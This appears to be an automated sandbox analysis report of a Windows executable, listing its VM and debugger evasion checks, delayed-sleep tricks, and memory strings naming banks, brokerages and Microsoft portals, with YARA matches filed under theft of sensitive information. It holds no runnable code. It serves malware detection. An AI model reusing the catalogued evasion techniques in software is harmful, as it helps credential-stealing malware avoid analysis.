                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043C0CD rdtsc 0_2_0043C0CD
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599780Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599670Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599544Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599398Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599166Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599061Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598952Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598843Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598734Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598624Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598515Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598296Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598185Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597968Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597858Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597749Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597640Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597421Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597201Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597093Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596867Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596614Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596484Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596371Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596251Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596107Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595874Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595765Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595656Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595546Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595437Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595328Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595218Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595109Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594999Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594890Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594777Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594671Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeWindow / User API: threadDelayed 2550Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeWindow / User API: threadDelayed 6595Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668Thread sleep count: 86 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668Thread sleep count: 79 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668Thread sleep count: 86 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7668Thread sleep count: 158 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7892Thread sleep count: 2550 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -599890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7892Thread sleep count: 6595 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -599780s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -599670s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -599544s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -599398s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -599166s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -599061s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598952s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598843s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598624s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598406s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598296s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598185s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -598078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597858s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597749s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597201s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -597093s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596867s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596614s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596371s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596251s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -596107s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595874s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -595109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -594999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -594890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -594777s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -594671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe TID: 7888Thread sleep time: -594562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599780Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599670Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599544Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599398Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599166Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 599061Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598952Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598843Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598734Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598624Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598515Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598296Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598185Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597968Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597858Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597749Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597640Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597421Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597201Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 597093Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596867Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596614Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596484Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596371Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596251Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 596107Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595874Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595765Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595656Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595546Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595437Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595328Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595218Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 595109Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594999Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594890Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594777Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594671Jump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread delayed: delay time: 594562Jump to behavior
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: x8M2g1Xxhz.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3793643274.000000000094D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: x8M2g1Xxhz.exeBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd329d9dfe367a<
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005BE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: NTICE
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: SICE
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeFile opened: SIWVID
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_0043C0CD rdtsc 0_2_0043C0CD
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeCode function: 0_2_08309178 LdrInitializeThunk,0_2_08309178
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: x8M2g1Xxhz.exe, 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Managerh
                      Source: x8M2g1Xxhz.exe, x8M2g1Xxhz.exe, 00000000.00000002.3793191693.0000000000606000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x8M2g1Xxhz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
